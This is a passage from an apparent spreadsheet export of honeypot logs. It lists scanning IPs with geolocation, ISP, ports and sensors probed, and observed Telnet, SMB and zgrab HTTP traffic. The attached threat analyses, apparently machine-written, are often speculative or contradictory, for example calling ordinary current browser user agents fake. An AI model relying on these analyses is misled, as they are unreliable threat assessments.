    <s v="ZEN-ECN"/>
    <s v="Zenlayer Inc"/>
    <s v="consumer"/>
    <s v="Zenla"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:800e:41d3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <s v="A user attempted to log into a service using a fake browser signature, likely attempting to remain anonymous or evade detection. The browser and operating system details appear to be fabricated. This suggests an attempt at spoofing legitimate traffic. &amp;&amp; An unknown device attempted to access a login page for an HTTP service. The device is likely using a fake or spoofed user agent to conceal its identity. It claims to be running Android 10 on a Linux-based system. &amp;&amp; An attempt to login to a web service using an Android device with a suspiciously outdated browser version, possibly indicating malware or phishing activity. The user agent string is fake, suggesting automated or scripted behavior. This could be a malicious actor trying to access unauthorized accounts."/>
    <m/>
  </r>
  <r>
    <x v="657"/>
    <x v="657"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T15:01:20"/>
    <d v="2025-04-23T20:04:49"/>
    <d v="2025-04-27T15:01:20"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="47"/>
    <s v="Gyeongsangbuk-do"/>
    <s v="Gyeongsan-si"/>
    <s v="Gyeongsan-si (Hayang-eup)"/>
    <s v="1841598"/>
    <s v="NA"/>
    <s v="35.9132"/>
    <s v="128.819"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-03"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:762d:dc8c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No login attempt was made over this service, as the status is still set to 'Not Applicable'. &amp;&amp; No malicious activity detected, as TELNET service is not active or has no connection attempts made. _x000a_There are no incoming or outgoing connections to the TELNET service recorded. _x000a_No related activity found in the log data for this particular service."/>
    <s v="Port Scanning"/>
  </r>
  <r>
    <x v="658"/>
    <x v="658"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T15:01:19"/>
    <d v="2024-04-13T08:59:54"/>
    <d v="2025-04-27T15:01:19"/>
    <n v="92"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SSH_H2&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MSSQL_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;22&amp;&amp;12089&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KZ"/>
    <s v="Kazakhstan"/>
    <s v="75"/>
    <s v="Almaty"/>
    <s v="Karasay District"/>
    <s v="Almaty"/>
    <s v="1526384"/>
    <s v="050000"/>
    <s v="43.238"/>
    <s v="76.8829"/>
    <s v="9198"/>
    <s v="JSC Kazakhtelecom"/>
    <s v="JSC Kazakhtelecom"/>
    <s v="business"/>
    <s v="Zhezuniverbaikonurova"/>
    <s v="2004-06-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,55828)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,55905)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,60585)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,60660)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,52018)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,52103)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,61383)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,61559)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (84.240.246.50,56369)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:54f0:f632"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is insufficient information to determine any malicious activity. The log data appears to be incomplete or missing. This makes it impossible to analyze for potential security threats. &amp;&amp; An unknown client attempted to establish a connection from IP address 84.240.246.50 using an unusual port number 56369, which could be indicative of malicious scanning or probing activity. This may be an attempt to exploit vulnerabilities in the system or gain unauthorized access. The use of a high-numbered port is often associated with malicious intent."/>
    <s v="SMB Scan"/>
  </r>
  <r>
    <x v="659"/>
    <x v="659"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T14:10:32"/>
    <d v="2024-12-05T05:48:48"/>
    <d v="2025-04-27T14:10:32"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="71"/>
    <s v="Cherkasy"/>
    <s v="Cherkasy Raion"/>
    <s v="Cherkasy"/>
    <s v="710791"/>
    <s v="NA"/>
    <s v="49.4413"/>
    <s v="32.0643"/>
    <s v="25133"/>
    <s v="LLC McLaut-Invest"/>
    <s v="broadband"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4e89:514"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="660"/>
    <x v="660"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T14:01:16"/>
    <d v="2025-04-27T14:01:16"/>
    <d v="2025-04-27T14:01:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:ba1f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is no data available for the Telnet service, indicating it has not been used or accessed recently._x000a_This lack of activity might be due to the service being disabled or not being monitored properly._x000a_The absence of data could also mean that the service is secure and hasn't been targeted by malicious actors. &amp;&amp; No TELNET activity detected, indicating potential scanning or probing attempts for vulnerable ports._x000a_TELNET is an outdated protocol often exploited by malicious actors for unauthorized access._x000a_This suggests possible reconnaissance efforts to identify vulnerabilities on the system."/>
    <m/>
  </r>
  <r>
    <x v="661"/>
    <x v="661"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T13:46:21"/>
    <d v="2025-04-27T13:46:21"/>
    <d v="2025-04-27T13:46:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="QA"/>
    <s v="Qatar"/>
    <s v="DA"/>
    <s v="Baladīyat ad Dawḩah"/>
    <s v="NA"/>
    <s v="Doha"/>
    <s v="290030"/>
    <s v="NA"/>
    <s v="25.2854"/>
    <s v="51.531"/>
    <s v="8781"/>
    <s v="QA-ISP"/>
    <s v="Ooredoo-Broadband"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4e64:dd90"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="662"/>
    <x v="662"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T13:43:00"/>
    <d v="2024-02-15T02:50:45"/>
    <d v="2025-04-27T13:43:00"/>
    <n v="767"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_IPP_H24&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_SOCKS5_H38&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_FTP_H21&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTPS_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;389&amp;&amp;80&amp;&amp;22&amp;&amp;389&amp;&amp;443&amp;&amp;445&amp;&amp;631&amp;&amp;5900&amp;&amp;1080&amp;&amp;80&amp;&amp;21729&amp;&amp;23&amp;&amp;46259&amp;&amp;1080&amp;&amp;11584&amp;&amp;8443&amp;&amp;54576&amp;&amp;NA&amp;&amp;57898&amp;&amp;36613&amp;&amp;36914&amp;&amp;55580&amp;&amp;33945&amp;&amp;50695&amp;&amp;47971&amp;&amp;57415&amp;&amp;36115&amp;&amp;42289&amp;&amp;35199&amp;&amp;59302&amp;&amp;33219&amp;&amp;51767&amp;&amp;46215"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="202425"/>
    <s v="IP Volume inc"/>
    <s v="IP Volume inc"/>
    <s v="hosting"/>
    <s v="IP Volume inc"/>
    <s v="2008-08-29"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5e66:3863"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Possible malicious activity: A request was made to a server with an unusual host IP address, possibly attempting to scan or probe the system. The User-Agent header is set to a suspicious value that may indicate automated scanning software. This could be part of a larger reconnaissance effort. &amp;&amp; This data indicates a potential scan of the target's HTTPS service, possibly searching for vulnerabilities or exposed services with the User-Agent identifying as a custom tool and the Accept-Encoding header suggesting support for compression which could be used for evasion. The IP address 38.54.115.66 is attempting to access the root directory '/' via an HTTP GET request. &amp;&amp; The data indicates that there was an attempt to connect to an LDAP service, but it is unknown if the connection was successful. The lack of further information suggests a failed or incomplete connection attempt. This could be a reconnaissance or attack in progress. &amp;&amp; No FTP activity detected, potentially indicating no malicious login attempts via this service. This could be due to no connections or the honeypot being inactive for FTP. A possible explanation is that the threat actor didn't target FTP or wasn't interested in using it. &amp;&amp; No FTP data available, possibly indicating normal or legitimate service usage. No notable malicious activity detected through FTP connection attempts. Normal operation without any suspicious FTP activity. &amp;&amp; A request was made to a server from an unknown host with a generic User-Agent header, indicating potential automated activity. The request is for the root directory of the site and includes support for gzip compression, which can help hide malicious data."/>
    <m/>
  </r>
  <r>
    <x v="663"/>
    <x v="663"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T13:11:03"/>
    <d v="2024-11-29T14:00:57"/>
    <d v="2025-04-27T13:11:03"/>
    <n v="44"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Firozpur"/>
    <s v="Abohar (Nai Abadi)"/>
    <s v="1279403"/>
    <s v="152116"/>
    <s v="30.1326"/>
    <s v="74.1897"/>
    <s v="137655"/>
    <s v="Angel Air Network Solutions Pvt. Ltd."/>
    <s v="Angel Air Network Solutions Pvt. Ltd"/>
    <s v="business"/>
    <s v="Angel Air Network Solutions Pvt. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:678c:20b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="664"/>
    <x v="664"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T13:01:11"/>
    <d v="2024-04-15T12:37:36"/>
    <d v="2025-04-27T13:01:11"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="26650&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NIB"/>
    <s v="2007-08-01"/>
    <s v="BSNLNET"/>
    <s v="None"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:af03"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No activity detected, unknown or invalid connection attempt to TELNET service. _x000a_TELNET service appears to be idle with no incoming connections._x000a_No suspicious behavior observed for this service at this time. &amp;&amp; No connection attempt was made over Telnet service, indicating potential probing or scanning activity. _x000a_This could be an attacker trying to identify available services on the system._x000a_The lack of a connection attempt suggests a reconnaissance step in a larger attack."/>
    <s v="Port Scan"/>
  </r>
  <r>
    <x v="665"/>
    <x v="665"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T12:27:50"/>
    <d v="2025-04-27T12:27:50"/>
    <d v="2025-04-27T12:27:50"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BH"/>
    <s v="Bahrain"/>
    <s v="13"/>
    <s v="Manama"/>
    <s v="NA"/>
    <s v="Manama"/>
    <s v="290340"/>
    <s v="NA"/>
    <s v="26.2279"/>
    <s v="50.5857"/>
    <s v="5416"/>
    <s v="UNSPECIFIED"/>
    <s v="Bahrain Telecommunication Company"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5994:2a6a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <s v="A user attempted to log in via HTTP using a fake or stolen identity, likely trying to gain unauthorized access to an account or system, possibly from a Windows 10 machine with Chrome browser. The user agent string suggests a realistic attempt to mimic legitimate traffic. This could be part of a larger attack to compromise sensitive information. &amp;&amp; An unknown user is attempting to log in via HTTP using a browser string that suggests it's likely a fake or automated login attempt from a Windows system with suspicious browser version. _x000a_The browser claims to be Google Chrome but has a highly exaggerated and unrealistic version number which may indicate spoofing._x000a_This could be an indication of a botnet or script trying to gain unauthorized access."/>
    <m/>
  </r>
  <r>
    <x v="666"/>
    <x v="666"/>
    <s v="NA"/>
